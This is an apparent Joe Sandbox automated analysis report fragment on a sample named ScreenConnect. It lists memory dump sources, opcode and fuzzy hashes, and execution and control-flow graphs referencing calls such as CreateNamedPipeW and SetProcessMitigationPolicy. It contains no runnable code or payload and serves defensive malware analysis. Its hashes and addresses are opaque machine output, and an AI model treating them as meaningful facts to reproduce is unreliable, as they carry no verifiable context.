                                                                      • Instruction ID: fa809b5db0a9a83f086302cae8de17828563d219f034a97ccf82a04542591bee
                                                                      • Opcode Fuzzy Hash: 28c7f580fd9817a9de8a93c9759c7652a0235ccf72acc8cc71148564e408b1d3
                                                                      • Instruction Fuzzy Hash: 771103B1C102599FDB10DF9AC8847DEBBF4EB48324F148529D469B7250C778A645CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2968658583.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_164d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 652e8f288c4dc7e5f20e1d1868551bf2b0f73d90ffc9bae7f6788254442c6445
                                                                      • Instruction ID: 688cac6c0f4e38d1e099464ea8b8bace17f9c854622a381b37f654f95dafeb28
                                                                      • Opcode Fuzzy Hash: 652e8f288c4dc7e5f20e1d1868551bf2b0f73d90ffc9bae7f6788254442c6445
                                                                      • Instruction Fuzzy Hash: 332100B1A04240DFDB05DF98D9C0B2ABF65FBA8314F20C169E9090B256C736D856CAA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2968658583.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_164d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction ID: f53e1153832749eb39443449edf737ea2d55c8a504a6530cb4b6669debeaabc1
                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                      • Instruction Fuzzy Hash: AC11BE76904280CFDB16CF54D9C4B16BF72FB98324F24C6A9D9090B657C33AD45ACBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2968658583.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_164d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 01c3215f847b8b0fe0aaa8be411ebc3e6ea44c53f222a0b2febe05cf3d0afd59
                                                                      • Instruction ID: 2c83f0e86534e1d069bf3eef8d15bf63b2a6aa944b4d4ca9ab4065a6c0f99f00
                                                                      • Opcode Fuzzy Hash: 01c3215f847b8b0fe0aaa8be411ebc3e6ea44c53f222a0b2febe05cf3d0afd59
                                                                      • Instruction Fuzzy Hash: 03012B71808340ABE7104E69CDC4B67BFD8EF517A4F08C56AED080B286C379D842C6B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2968658583.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_164d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e95a12766732f48c86c68aafa104f884a439a02a488dfa773b83218eebb3566
                                                                      • Instruction ID: ba77dc829b124eeba5d8a358542f505a43b74d42c5510c073d077e7ff2554cfe
                                                                      • Opcode Fuzzy Hash: 7e95a12766732f48c86c68aafa104f884a439a02a488dfa773b83218eebb3566
                                                                      • Instruction Fuzzy Hash: A1F06DB1408344AEE7118E1ACCC4B62FFE8EB55664F18C55AED484F286C3799845CAB1
                                                                      APIs
                                                                      • RtlGetVersion.NTDLL(0000009C), ref: 016C4DF6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2969100985.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_16c0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID: `Q^q
                                                                      • API String ID: 1889659487-1948671464
                                                                      • Opcode ID: e684e24f7802d41a09e756e5b4a497bbbc5175f10b214f666a4b8a3150668577
                                                                      • Instruction ID: 93a7ab4f618fa5150c1e1277321f59a0117b4d26623365f23cc271e6dd7eb494
                                                                      • Opcode Fuzzy Hash: e684e24f7802d41a09e756e5b4a497bbbc5175f10b214f666a4b8a3150668577
                                                                      • Instruction Fuzzy Hash: 3E212771904268EFEB60DF19CC54B99FBB9FB08710F1085D9D50C67240CB756A98CF92

                                                                      Execution Graph

                                                                      Execution Coverage:11.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:37.5%
                                                                      Total number of Nodes:8
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 12146 7ffd9b347e84 12148 7ffd9b347e8d 12146->12148 12147 7ffd9b347ef2 12148->12147 12149 7ffd9b347f66 SetProcessMitigationPolicy 12148->12149 12150 7ffd9b347fc2 12149->12150 12142 7ffd9b3431c2 12143 7ffd9b3635c0 CreateNamedPipeW 12142->12143 12145 7ffd9b3636f3 12143->12145

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 401 7ffd9b64246d-7ffd9b642491 404 7ffd9b642493-7ffd9b642495 401->404 405 7ffd9b6424f6-7ffd9b642544 401->405 407 7ffd9b642497-7ffd9b6424b0 404->407 408 7ffd9b642496 404->408 415 7ffd9b642568-7ffd9b6425ec 405->415 416 7ffd9b642546-7ffd9b642567 405->416 407->408 417 7ffd9b6424b2-7ffd9b6424e3 407->417 408->407 432 7ffd9b6425ee-7ffd9b64260a 415->432 433 7ffd9b642636-7ffd9b64263c 415->433 416->415 417->405 434 7ffd9b642610-7ffd9b64262e 432->434 435 7ffd9b642976-7ffd9b642994 432->435 436 7ffd9b642643-7ffd9b642646 433->436 448 7ffd9b642634-7ffd9b642635 434->448 449 7ffd9b64280c-7ffd9b64282a 434->449 445 7ffd9b642aa0-7ffd9b642aab 435->445 446 7ffd9b64299a-7ffd9b6429a1 435->446 437 7ffd9b642648-7ffd9b64264a 436->437 438 7ffd9b64264c-7ffd9b64265a 436->438 441 7ffd9b64265d-7ffd9b642672 437->441 438->441 452 7ffd9b642674-7ffd9b642676 441->452 453 7ffd9b642678-7ffd9b642686 441->453 450 7ffd9b6429b4-7ffd9b6429b6 446->450 451 7ffd9b6429a3-7ffd9b6429b2 446->451 448->433 467 7ffd9b642854-7ffd9b642872 449->467 468 7ffd9b64282c-7ffd9b642836 449->468 454 7ffd9b6429bd-7ffd9b6429e1 450->454 451->450 459 7ffd9b6429b8 451->459 455 7ffd9b642689-7ffd9b642697 452->455 453->455 465 7ffd9b642a2d-7ffd9b642a3b 454->465 466 7ffd9b6429e3-7ffd9b642a00 454->466 463 7ffd9b64269d-7ffd9b6426ab 455->463 464 7ffd9b642699-7ffd9b64269b 455->464 459->454 469 7ffd9b6426ae-7ffd9b6426bd 463->469 464->469 476 7ffd9b642a3d-7ffd9b642a5d 465->476 477 7ffd9b642a66-7ffd9b642a72 465->477 479 7ffd9b642a06-7ffd9b642a2b 466->479 480 7ffd9b642aac-7ffd9b642b27 466->480 490 7ffd9b642878-7ffd9b642883 467->490 491 7ffd9b642929-7ffd9b642934 467->491 472 7ffd9b642838-7ffd9b642848 468->472 473 7ffd9b64284a 468->473 469->449 484 7ffd9b6426c3-7ffd9b6426ca 469->484 474 7ffd9b64284c-7ffd9b64284d 472->474 473->474 474->467 502 7ffd9b642a5f-7ffd9b642a61 476->502 503 7ffd9b642a63-7ffd9b642a64 476->503 493 7ffd9b642a75-7ffd9b642a7c 477->493 479->465 506 7ffd9b642b70-7ffd9b642bc6 480->506 507 7ffd9b642b29-7ffd9b642b6e 480->507 484->449 489 7ffd9b6426d0-7ffd9b6426e7 484->489 511 7ffd9b64271c-7ffd9b642727 489->511 512 7ffd9b6426e9-7ffd9b6426fb 489->512 513 7ffd9b642885-7ffd9b642887 490->513 514 7ffd9b642889-7ffd9b642898 490->514 509 7ffd9b642936-7ffd9b642938 491->509 510 7ffd9b64293a-7ffd9b64293e 491->510 497 7ffd9b642a7e-7ffd9b642a8f 493->497 498 7ffd9b642a91-7ffd9b642a92 493->498 500 7ffd9b642a94-7ffd9b642a99 497->500 498->500 500->445 502->493 503->477 528 7ffd9b642bc8-7ffd9b642bc9 506->528 529 7ffd9b642bcc-7ffd9b642bf0 506->529 507->506 517 7ffd9b64294c-7ffd9b64294e 509->517 523 7ffd9b642948-7ffd9b642949 510->523 530 7ffd9b64272d-7ffd9b64273c 511->530 531 7ffd9b642729-7ffd9b64272b 511->531 533 7ffd9b6426fd-7ffd9b6426ff 512->533 534 7ffd9b642701-7ffd9b64270f 512->534 518 7ffd9b64289b-7ffd9b6428aa 513->518 514->518 517->445 524 7ffd9b642954-7ffd9b642966 517->524 520 7ffd9b6428ab-7ffd9b6428c9 518->520 546 7ffd9b6428cb-7ffd9b6428cf 520->546 523->517 524->435 524->523 528->529 550 7ffd9b642c22-7ffd9b642c2b 529->550 551 7ffd9b642bf2-7ffd9b642c01 529->551 536 7ffd9b64273f-7ffd9b642741 530->536 531->536 537 7ffd9b642712-7ffd9b642715 533->537 534->537 543 7ffd9b642747-7ffd9b64275e 536->543 544 7ffd9b6427f6-7ffd9b642804 536->544 537->511 543->544 558 7ffd9b642764-7ffd9b642781 543->558 547 7ffd9b642806-7ffd9b642808 544->547 546->491 549 7ffd9b6428d1-7ffd9b6428df 546->549 547->449 554 7ffd9b6428f2-7ffd9b6428fa 549->554 555 7ffd9b6428e1-7ffd9b6428e9 549->555 556 7ffd9b642c03-7ffd9b642c04 551->556 557 7ffd9b642c07-7ffd9b642c21 551->557 559 7ffd9b6428fb-7ffd9b6428fc 554->559 561 7ffd9b64290c-7ffd9b642926 554->561 555->559 560 7ffd9b6428eb-7ffd9b6428f0 555->560 556->557 571 7ffd9b64278d 558->571 572 7ffd9b642783-7ffd9b64278b 558->572 563 7ffd9b642901-7ffd9b64290b call 7ffd9b640b80 559->563 560->563 561->491 563->561 573 7ffd9b64278f-7ffd9b642791 571->573 572->573 573->544 575 7ffd9b642793-7ffd9b64279d 573->575 576 7ffd9b64279f-7ffd9b6427a9 575->576 577 7ffd9b6427ab-7ffd9b6427b3 575->577 576->449 576->577 578 7ffd9b6427e1-7ffd9b6427f4 call 7ffd9b640b70 577->578 579 7ffd9b6427b5-7ffd9b6427da call 7ffd9b640a28 577->579 578->449 579->578
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 4193aeb7845474e7e8f3140142a71b9e6a41b0161a4728499c41fbb21c467b14
                                                                      • Instruction ID: 0a26713b2f1bc8d283ae6799e7277c4c41a4004e73fafac2c495a3e6d464858f
                                                                      • Opcode Fuzzy Hash: 4193aeb7845474e7e8f3140142a71b9e6a41b0161a4728499c41fbb21c467b14
                                                                      • Instruction Fuzzy Hash: 16322621B1EE4A0BE765ABE884717B927D3EF84310F2640BED45DCB1E3DD28BA458350

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 605 7ffd9b3431c2-7ffd9b36362a 608 7ffd9b363634-7ffd9b3636f1 CreateNamedPipeW 605->608 609 7ffd9b36362c-7ffd9b363631 605->609 611 7ffd9b3636f3 608->611 612 7ffd9b3636f9-7ffd9b36372c 608->612 609->608 611->612
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2986773359.00007FFD9B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B340000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b340000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2489174969-0
                                                                      • Opcode ID: 09a43c229cce94add818f797a546e7ca3f0e9aa5440e7f7e3d2b6d5641c0b078
                                                                      • Instruction ID: 63d1f7778b43f18ac68ffba7550e1e92cf6854bc80c955b46771e692e47a38d3
                                                                      • Opcode Fuzzy Hash: 09a43c229cce94add818f797a546e7ca3f0e9aa5440e7f7e3d2b6d5641c0b078
                                                                      • Instruction Fuzzy Hash: 8B51B27191CA5C8FDB68EF5C9846BE9B7E0FB59310F0442AEE44ED3251CB70A9418BC1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3ef9eed531a57a9deb8d88ffc4f5737fca38880776dc57089f182f14341054d
                                                                      • Instruction ID: d77457288352ea74d571f3bf347557ed989a5f6f6e7864ae211e3dca8143eacd
                                                                      • Opcode Fuzzy Hash: a3ef9eed531a57a9deb8d88ffc4f5737fca38880776dc57089f182f14341054d
                                                                      • Instruction Fuzzy Hash: 62824531B1EE4E4FEBA8EA6884657B437D2EF94300F1501BDD46DCB1E6DE28B9418741
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d9c66547f0a9215b3593b0a4bf708ef257fe7e1fd1c87a47753982907874bdf0
                                                                      • Instruction ID: 00762ba693acae5b985e2adb9e4bfa51e3fc75c18f0ed7094cde424db8f769bc
                                                                      • Opcode Fuzzy Hash: d9c66547f0a9215b3593b0a4bf708ef257fe7e1fd1c87a47753982907874bdf0
                                                                      • Instruction Fuzzy Hash: 4A223431B1DE4A4FEBA8EB6884A57B47BD2EF94300F0501BED45DCB1E6DD28B9418741

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2986773359.00007FFD9B340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B340000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b340000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: 228030bc4e5b6fe93e6867d6c514690968bde16d6d5e44545e39f2fac4f9d045
                                                                      • Instruction ID: 2390b5c62dc3a1c89cf6fdb0e373aca2e136af5bf361d7223c6c45edc2bf4872
                                                                      • Opcode Fuzzy Hash: 228030bc4e5b6fe93e6867d6c514690968bde16d6d5e44545e39f2fac4f9d045
                                                                      • Instruction Fuzzy Hash: F6514B31E1CB494FE714EFA898465F97BE1EF55310F0002BFD089C3192DE68A8458791

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 688 7ffd9b6424e8-7ffd9b642544 695 7ffd9b642568-7ffd9b6425ec 688->695 696 7ffd9b642546-7ffd9b642567 688->696 707 7ffd9b6425ee-7ffd9b64260a 695->707 708 7ffd9b642636-7ffd9b642646 695->708 696->695 709 7ffd9b642610-7ffd9b64262e 707->709 710 7ffd9b642976-7ffd9b642994 707->710 712 7ffd9b642648-7ffd9b64264a 708->712 713 7ffd9b64264c-7ffd9b64265a 708->713 723 7ffd9b642634-7ffd9b642635 709->723 724 7ffd9b64280c-7ffd9b64282a 709->724 720 7ffd9b642aa0-7ffd9b642aab 710->720 721 7ffd9b64299a-7ffd9b6429a1 710->721 716 7ffd9b64265d-7ffd9b642672 712->716 713->716 727 7ffd9b642674-7ffd9b642676 716->727 728 7ffd9b642678-7ffd9b642686 716->728 725 7ffd9b6429b4-7ffd9b6429b6 721->725 726 7ffd9b6429a3-7ffd9b6429b2 721->726 723->708 742 7ffd9b642854-7ffd9b642872 724->742 743 7ffd9b64282c-7ffd9b642836 724->743 729 7ffd9b6429bd-7ffd9b6429e1 725->729 726->725 734 7ffd9b6429b8 726->734 730 7ffd9b642689-7ffd9b642697 727->730 728->730 740 7ffd9b642a2d-7ffd9b642a3b 729->740 741 7ffd9b6429e3-7ffd9b642a00 729->741 738 7ffd9b64269d-7ffd9b6426ab 730->738 739 7ffd9b642699-7ffd9b64269b 730->739 734->729 744 7ffd9b6426ae-7ffd9b6426bd 738->744 739->744 751 7ffd9b642a3d-7ffd9b642a5d 740->751 752 7ffd9b642a66-7ffd9b642a72 740->752 754 7ffd9b642a06-7ffd9b642a2b 741->754 755 7ffd9b642aac-7ffd9b642b27 741->755 765 7ffd9b642878-7ffd9b642883 742->765 766 7ffd9b642929-7ffd9b642934 742->766 747 7ffd9b642838-7ffd9b642848 743->747 748 7ffd9b64284a 743->748 744->724 759 7ffd9b6426c3-7ffd9b6426ca 744->759 749 7ffd9b64284c-7ffd9b64284d 747->749 748->749 749->742 777 7ffd9b642a5f-7ffd9b642a61 751->777 778 7ffd9b642a63-7ffd9b642a64 751->778 768 7ffd9b642a75-7ffd9b642a7c 752->768 754->740 781 7ffd9b642b70-7ffd9b642bc6 755->781 782 7ffd9b642b29-7ffd9b642b6e 755->782 759->724 764 7ffd9b6426d0-7ffd9b6426e7 759->764 786 7ffd9b64271c-7ffd9b642727 764->786 787 7ffd9b6426e9-7ffd9b6426fb 764->787 788 7ffd9b642885-7ffd9b642887 765->788 789 7ffd9b642889-7ffd9b642898 765->789 784 7ffd9b642936-7ffd9b642938 766->784 785 7ffd9b64293a-7ffd9b64293e 766->785 772 7ffd9b642a7e-7ffd9b642a8f 768->772 773 7ffd9b642a91-7ffd9b642a92 768->773 775 7ffd9b642a94-7ffd9b642a99 772->775 773->775 775->720 777->768 778->752 803 7ffd9b642bc8-7ffd9b642bc9 781->803 804 7ffd9b642bcc-7ffd9b642bf0 781->804 782->781 792 7ffd9b64294c-7ffd9b64294e 784->792 798 7ffd9b642948-7ffd9b642949 785->798 805 7ffd9b64272d-7ffd9b64273c 786->805 806 7ffd9b642729-7ffd9b64272b 786->806 808 7ffd9b6426fd-7ffd9b6426ff 787->808 809 7ffd9b642701-7ffd9b64270f 787->809 793 7ffd9b64289b-7ffd9b6428aa 788->793 789->793 792->720 799 7ffd9b642954-7ffd9b642966 792->799 795 7ffd9b6428ab-7ffd9b6428c9 793->795 821 7ffd9b6428cb-7ffd9b6428cf 795->821 798->792 799->710 799->798 803->804 825 7ffd9b642c22-7ffd9b642c2b 804->825 826 7ffd9b642bf2-7ffd9b642c01 804->826 811 7ffd9b64273f-7ffd9b642741 805->811 806->811 812 7ffd9b642712-7ffd9b642715 808->812 809->812 818 7ffd9b642747-7ffd9b64275e 811->818 819 7ffd9b6427f6-7ffd9b642808 811->819 812->786 818->819 833 7ffd9b642764-7ffd9b642781 818->833 819->724 821->766 824 7ffd9b6428d1-7ffd9b6428df 821->824 829 7ffd9b6428f2-7ffd9b6428fa 824->829 830 7ffd9b6428e1-7ffd9b6428e9 824->830 831 7ffd9b642c03-7ffd9b642c04 826->831 832 7ffd9b642c07-7ffd9b642c21 826->832 834 7ffd9b6428fb-7ffd9b6428fc 829->834 836 7ffd9b64290c-7ffd9b642926 829->836 830->834 835 7ffd9b6428eb-7ffd9b6428f0 830->835 831->832 846 7ffd9b64278d 833->846 847 7ffd9b642783-7ffd9b64278b 833->847 838 7ffd9b642901-7ffd9b64290b call 7ffd9b640b80 834->838 835->838 836->766 838->836 848 7ffd9b64278f-7ffd9b642791 846->848 847->848 848->819 850 7ffd9b642793-7ffd9b64279d 848->850 851 7ffd9b64279f-7ffd9b6427a9 850->851 852 7ffd9b6427ab-7ffd9b6427b3 850->852 851->724 851->852 853 7ffd9b6427e1-7ffd9b6427f4 call 7ffd9b640b70 852->853 854 7ffd9b6427b5-7ffd9b6427da call 7ffd9b640a28 852->854 853->724 854->853
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: a2372fbeb379878b566620b8f6e62550e239be8d5a1cbca0ecfe748eb0d578b9
                                                                      • Instruction ID: 32aa70a106e8d92c06f1e29b8278841cebc5ec1285f6c6ddd3a2bbcb6e238954
                                                                      • Opcode Fuzzy Hash: a2372fbeb379878b566620b8f6e62550e239be8d5a1cbca0ecfe748eb0d578b9
                                                                      • Instruction Fuzzy Hash: B4C10832B1FE4E4AE775AAE844713BD66D3AF94340F26407DD46DCB1E2ED28BA418250
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7dec36b83e66b5b94230e17c779ada9c803589f1444c885715dec83c9b6c148
                                                                      • Instruction ID: 41fab22a21f4805804631ff44109be4fe56da79f62b034243fc8a2d6617700b3
                                                                      • Opcode Fuzzy Hash: d7dec36b83e66b5b94230e17c779ada9c803589f1444c885715dec83c9b6c148
                                                                      • Instruction Fuzzy Hash: C0B13D22A0FE8A5FEB66DB6488719B53BE1EF51710B0501BFD49D8B0E3ED18B906C741
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 886b4cd1548e024973c5b3842c040ef8e420833587a35b65d0d43f61f0c65dba
                                                                      • Instruction ID: 2224461f0e17458813cb6bc7d52f75cfa3b062d85e757364e89df81bd04d894a
                                                                      • Opcode Fuzzy Hash: 886b4cd1548e024973c5b3842c040ef8e420833587a35b65d0d43f61f0c65dba
                                                                      • Instruction Fuzzy Hash: 58816B3370DF0E4FFB68996CA49627577C2EB99760B01017FD89AC72A2ED26BC034241
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7c51236ec7e5350b9f31a9333679a1e50a82e3b630b98aea2533c572647ed5c2
                                                                      • Instruction ID: df601bd7d23f39aeefae8775868ab0a6b53200a3d1895eeefbdc4b344b544065
                                                                      • Opcode Fuzzy Hash: 7c51236ec7e5350b9f31a9333679a1e50a82e3b630b98aea2533c572647ed5c2
                                                                      • Instruction Fuzzy Hash: 27C18C62B1EECE0FE7659B7848716A07BE2FF61640B1901FED068CB1E7DD18B9068341
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1055a1f9d41dd148698f3af1286522137dd9d41a5c126c73ebca84f883f4158
                                                                      • Instruction ID: 53b3e393fc93d9c50bf793b8c8c44d471e175a9470d036098ff60ce8fa5c776b
                                                                      • Opcode Fuzzy Hash: e1055a1f9d41dd148698f3af1286522137dd9d41a5c126c73ebca84f883f4158
                                                                      • Instruction Fuzzy Hash: F081F632B0ED0E4BEFB8EA18D4629F533D2EF64710B40017DD85E875A6EE24F9468781
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fe1d189b062d3abf0a637406101d1193ccd8aaae385841293754f8c5d4cb1c3e
                                                                      • Instruction ID: be55b46c173c3662644a2c0f50d4a876522a73bf84a66a5a24df0e0f82312e87
                                                                      • Opcode Fuzzy Hash: fe1d189b062d3abf0a637406101d1193ccd8aaae385841293754f8c5d4cb1c3e
                                                                      • Instruction Fuzzy Hash: 64710816B0E59A0FD719776CF8B25F93B91DF42328B0902FAE5ADCB0EBDC0924468351
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5dbb09aba970216599265526401c8deae187620dac71e5b7d72af9338ba6a46c
                                                                      • Instruction ID: 2864f0bcc2103c75de3210b79153648ff7f1afe68e0e05989fe2f174f0616dfc
                                                                      • Opcode Fuzzy Hash: 5dbb09aba970216599265526401c8deae187620dac71e5b7d72af9338ba6a46c
                                                                      • Instruction Fuzzy Hash: 70412D32B0EE4E4BEB659A9898755E977D3EF98314F05017ED06CCB2A2EE257906C340
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1112587ccf457560cd68e3087f6bdbab5703bed7844174c7c7c81b6508255c9
                                                                      • Instruction ID: 07d7612d0a8f726b04004907d3ae509f6df7ab1c75cbec43c70d06ca84abd61f
                                                                      • Opcode Fuzzy Hash: d1112587ccf457560cd68e3087f6bdbab5703bed7844174c7c7c81b6508255c9
                                                                      • Instruction Fuzzy Hash: 2F312863B0EECE0FD7569B6848756B03BE2EF9621071A04FAD458CB1A7D918BC068351
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13e1c7091c625a414be1ac46bf56f62f6ae1a79843700b50ebecdb7c3aead150
                                                                      • Instruction ID: 0694f7bde29f53a9a4affc1d6c85bcea9e644b2f77741d564ea60ffec3092b22
                                                                      • Opcode Fuzzy Hash: 13e1c7091c625a414be1ac46bf56f62f6ae1a79843700b50ebecdb7c3aead150
                                                                      • Instruction Fuzzy Hash: B9313762B29E8E4BEBA9EB684071BB573D2FFA4740B14417DC02EC71D6EE24B9018740
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2992951933.00007FFD9B640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b640000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5684153cfdd358bb678fa08082155b5f8d961d33b91c617efe83cd066daab3ce
                                                                      • Instruction ID: 4f954f066ead3d48a5a3d3059bfe661ca0af7a5233430e3bad7da853ae6db69f
                                                                      • Opcode Fuzzy Hash: 5684153cfdd358bb678fa08082155b5f8d961d33b91c617efe83cd066daab3ce
                                                                      • Instruction Fuzzy Hash: 3D11CB41F1DE8A0FE795FBA828F46B42BD2EF9521030841FED40CC70ABDC2C98428391
                                                                      Memory Dump Source
